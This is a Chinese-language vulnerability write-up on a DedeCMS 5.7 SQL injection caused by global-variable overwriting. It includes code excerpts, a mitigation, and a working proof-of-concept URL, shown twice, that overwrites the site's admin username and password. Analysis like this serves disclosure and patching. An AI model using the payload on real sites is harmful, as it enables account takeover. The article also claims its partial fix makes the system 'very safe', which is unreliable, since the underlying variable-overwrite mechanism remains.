dedecms 5.7 注入漏洞及修复方法

浏览:
字体:
发布时间:2014-01-23 08:49:47
来源:
一. 漏洞跟踪
 
发布时间:2013年6月7日
 
漏洞描述:
 
DedeCMS是一个网站应用系统构建平台,也是一个强大的网站内容管理系统。基于PHP+MySQL的技术架构,完全开源加上强大稳定的技术架构,既可以用来构建复杂体系的企业信息门户或电子商务网站平台,也可以用来管理简单内容发布网站,不管是商务资源门户还是娱乐信息门户,它都是您管理网站的好帮手。
 
漏洞触发的根源在于dedesql.class.php在调用$GLOBALS[‘arrs1’]、$GLOBALS[‘arrs1’]这两个全局变量之前未对其进行初始化,导致能够覆盖任意全局变量。
 
漏洞危害:因为dedecms的使用非常广泛,而此漏洞利用方便,危害性高,能够远程获取管理后台,进而直接getshell获取系统控制权。
 
触发条件:确保php.ini中使用php_mysql.dll同时未开启php_mysqli.dll,
 
如图所示:
 
clip_image002[1]
 
受影响版本:dedecms 5.7
 
二. 漏洞原理
 
首先说一下dedecms不安全的参数处理机制,这里我们看一下/include/common.inc.php代码的第79行:
 
foreach(Array(‘_GET’,'_POST’,'_COOKIE’) as $_request)
 
      {
 
             foreach($$_request as $_k => $_v) 
 
            {
 
                    if($_k == ‘nvarname’) ${$_k} = $_v;
 
                   else ${$_k} = _RunMagicQuotes($_v);
 
            }
 
      }
 
万恶之源其实就在这里,基本上目前dede被发现的漏洞全都死在这里。我们可以看到,程序从GPC数组中取出名值对后,只是对$_v做了简单的addslashes处理,就直接赋给了${$_k},实现了类似全局变量覆盖的机制,设计的初衷是为了开发方便,但却存在着严重的安全问题。PHP在经历了这么多年的更新换代终于修补了register_globals问题,但是dede的这段代码使php付出的努力全部白费。
 
下面我们回归漏洞。
 
首先是/include/dedesql.class.php的第589-600行,
 
clip_image004[1]
 
在执行这段代码之前,程序未初始化$arrs1和$arrs2这两个数组。结合前面提到的dede不安全的参数处理机制,利用这段代码我们可以覆盖任意全局变量。例如在这个漏洞中,我们可以控制$GLOBALS['cfg_dbprefix']的值。
 
然后,我们来看一下如何利用$GLOBALS['cfg_dbprefix']。
 
这里在/include/dedesql.class.php的第512行SetQuery函数中,代码如下
 
 
clip_image006[1]
 
这里因为$GLOBALS['cfg_dbprefix']是可控的,进而$prefix也是可控的,所以在这儿就造成了SQL注入。
 
下面跟踪一下整个漏洞的触发过程,这是网上已经公开的PoC:
 
http://localhost/dedecms5.7/plus/download.php?open=1&arrs1[]=99&arrs1[]=102&arrs1[]=103&arrs1[]=95&arrs1[]=100&arrs1[]=98&arrs1[]=112&arrs1[]=114&arrs1[]=101&arrs1[]=102&arrs1[]=105&arrs1[]=120&arrs2[]=97&arrs2[]=100&arrs2[]=109&arrs2[]=105&arrs2[]=110&arrs2[]=96&arrs2[]=32&arrs2[]=83&arrs2[]=69&arrs2[]=84&arrs2[]=32&arrs2[]=96&arrs2[]=117&arrs2[]=115&arrs2[]=101&arrs2[]=114&arrs2[]=105&arrs2[]=100&arrs2[]=96&arrs2[]=61&arrs2[]=39&arrs2[]=116&arrs2[]=101&arrs2[]=115&arrs2[]=116&arrs2[]=39&arrs2[]=44&arrs2[]=32&arrs2[]=96&arrs2[]=112&arrs2[]=119&arrs2[]=100&arrs2[]=96&arrs2[]=61&arrs2[]=39&arrs2[]=102&arrs2[]=50&arrs2[]=57&arrs2[]=55&arrs2[]=97&arrs2[]=53&arrs2[]=55&arrs2[]=97&arrs2[]=53&arrs2[]=97&arrs2[]=55&arrs2[]=52&arrs2[]=51&arrs2[]=56&arrs2[]=57&arrs2[]=52&arrs2[]=97&arrs2[]=48&arrs2[]=101&arrs2[]=52&arrs2[]=39&arrs2[]=32&arrs2[]=119&arrs2[]=104&arrs2[]=101&arrs2[]=114&arrs2[]=101&arrs2[]=32&arrs2[]=105&arrs2[]=100&arrs2[]=61&arrs2[]=49&arrs2[]=32&arrs2[]=35
 
首先看这个if判断,意思是如果开启了mysqli扩展,则包含dedesqli.class.php。这里存在漏洞的代码在dedesql.class.php中,所以漏洞利用的前提条件是必须关闭mysqli扩展。
 
 
 
clip_image008[1]
这里跟入dedesql.class.php代码,如图
 
clip_image010[1]
所以执行到这里$GLOBALS['cfg_dbprefix']被覆盖为
 
admin` SET `userid`=’test’, `pwd`=’f297a57a5a743894a0e4′ where id=1 #
 
继续跟踪代码执行,
 
 
clip_image014[1]
 
跟入ExecuteNoneQuery2函数,一直跟进SetQuery,如图
 
clip_image016[1]
这里因为$GLOBALS['cfg_dbprefix']是我们可控的,所以就造成了注入,这里看一下$sql的值,如图所示
 
clip_image018[1]
 
因为ExecuteNoneQuery2函数没有使用mysql-ids进行过滤,所以这里借助它来注入。执行update成功之后,后台账户为test,密码为admin。
 
三. 漏洞验证
 
PoC:
 
http://localhost/dedecms5.7/plus/download.php?open=1&arrs1[]=99&arrs1[]=102&arrs1[]=103&arrs1[]=95&arrs1[]=100&arrs1[]=98&arrs1[]=112&arrs1[]=114&arrs1[]=101&arrs1[]=102&arrs1[]=105&arrs1[]=120&arrs2[]=97&arrs2[]=100&arrs2[]=109&arrs2[]=105&arrs2[]=110&arrs2[]=96&arrs2[]=32&arrs2[]=83&arrs2[]=69&arrs2[]=84&arrs2[]=32&arrs2[]=96&arrs2[]=117&arrs2[]=115&arrs2[]=101&arrs2[]=114&arrs2[]=105&arrs2[]=100&arrs2[]=96&arrs2[]=61&arrs2[]=39&arrs2[]=116&arrs2[]=101&arrs2[]=115&arrs2[]=116&arrs2[]=39&arrs2[]=44&arrs2[]=32&arrs2[]=96&arrs2[]=112&arrs2[]=119&arrs2[]=100&arrs2[]=96&arrs2[]=61&arrs2[]=39&arrs2[]=102&arrs2[]=50&arrs2[]=57&arrs2[]=55&arrs2[]=97&arrs2[]=53&arrs2[]=55&arrs2[]=97&arrs2[]=53&arrs2[]=97&arrs2[]=55&arrs2[]=52&arrs2[]=51&arrs2[]=56&arrs2[]=57&arrs2[]=52&arrs2[]=97&arrs2[]=48&arrs2[]=101&arrs2[]=52&arrs2[]=39&arrs2[]=32&arrs2[]=119&arrs2[]=104&arrs2[]=101&arrs2[]=114&arrs2[]=101&arrs2[]=32&arrs2[]=105&arrs2[]=100&arrs2[]=61&arrs2[]=49&arrs2[]=32&arrs2[]=35
 
验证截图:
 
 
clip_image020[1]
 
四. 漏洞修复
 
0×01、修改php.ini,确保开启php_mysqli.dll扩展。
 
0×02、修改/include/dedesql.class.php中的代码,如下所示
 
require_once(DEDEINC.’/common.func.php’);
 
//引入数据库类
 
if ($GLOBALS['cfg_mysql_type'] == ‘mysqli’ && function_exists(“mysqli_init”))
 
{
 
        //echo $GLOBALS['cfg_mysql_type'];
 
       //exit;
 
       require_once(DEDEINC.’/dedesqli.class.php’);
 
} else {
 
        require_once(DEDEINC.’/dedesql.class.php’);
 
}
 
//require_once(DEDEINC.’/common.func.php’);
 
完毕,这样,你的DEDECMS系统就非常安全了。

 

>更多相关文章
24小时热门资讯
24小时回复排行
资讯 | QQ | 安全 | 编程 | 数据库 | 系统 | 网络 | 考试 | 站长 | 关于东联 | 安全雇佣 | 搞笑视频大全 | 微信学院 | 视频课程 |
关于我们 | 联系我们 | 广告服务 | 免责申明 | 作品发布 | 网站地图 | 官方微博 | 技术培训
Copyright © 2007 - 2023 Vm888.Com. All Rights Reserved
粤公网安备 44060402001498号 粤ICP备19097316号 请遵循相关法律法规
');})();